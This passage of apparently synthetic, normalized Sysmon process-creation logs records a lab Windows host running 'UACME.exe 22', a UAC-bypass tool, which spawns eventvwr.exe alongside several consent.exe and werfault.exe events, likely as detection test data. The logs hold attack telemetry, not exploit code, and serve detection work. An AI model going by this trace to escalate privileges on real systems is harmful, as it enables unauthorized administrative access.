"3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "6388", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.578Z", "type": "raw", "uuid": "5c42d076-4c0d-491a-9196-39f2693106e3"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7537753Z\"},\"EventRecordID\":\"5444\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.399\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 318 0000028064471300", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "4740", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.399Z", "type": "raw", "uuid": "2a8d15ba-ff8a-4709-b122-f4121ea80dd1"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7215806Z\"},\"EventRecordID\":\"5443\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.350\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001027dc0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4604\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001027dc0601", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4604", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.350Z", "type": "raw", "uuid": "46a33b2f-ec5a-47cd-b6c0-98543e66a016"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:15.6646074Z\"},\"EventRecordID\":\"5442\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:15.660\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792f-5d45-0000-00103da80601}\"},{\"Name\":\"ProcessId\",\"text\":\"2388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC170\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC170", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792f-5d45-0000-00103da80601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "2388", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:15.660Z", "type": "raw", "uuid": "4e1d5f0f-b3c3-429c-9ef4-1346dd1497c0"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.9773218Z\"},\"EventRecordID\":\"5441\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.972\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-00104a760601}\"},{\"Name\":\"ProcessId\",\"text\":\"8072\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC890\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC890", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-00104a760601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "8072", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.972Z", "type": "raw", "uuid": "e547ebd6-7c5c-43f5-976a-3338e6f9d1e8"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.3727351Z\"},\"EventRecordID\":\"5440\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.368\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-001001560601}\"},{\"Name\":\"ProcessId\",\"text\":\"6716\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC9C0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC9C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-001001560601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "6716", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.368Z", "type": "raw", "uuid": "15801084-49e4-410f-8731-2d4fc0090ea9"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8748883Z\"},\"EventRecordID\":\"5439\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.760\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00107a250601}\"},{\"Name\":\"ProcessId\",\"text\":\"7472\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC3D0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 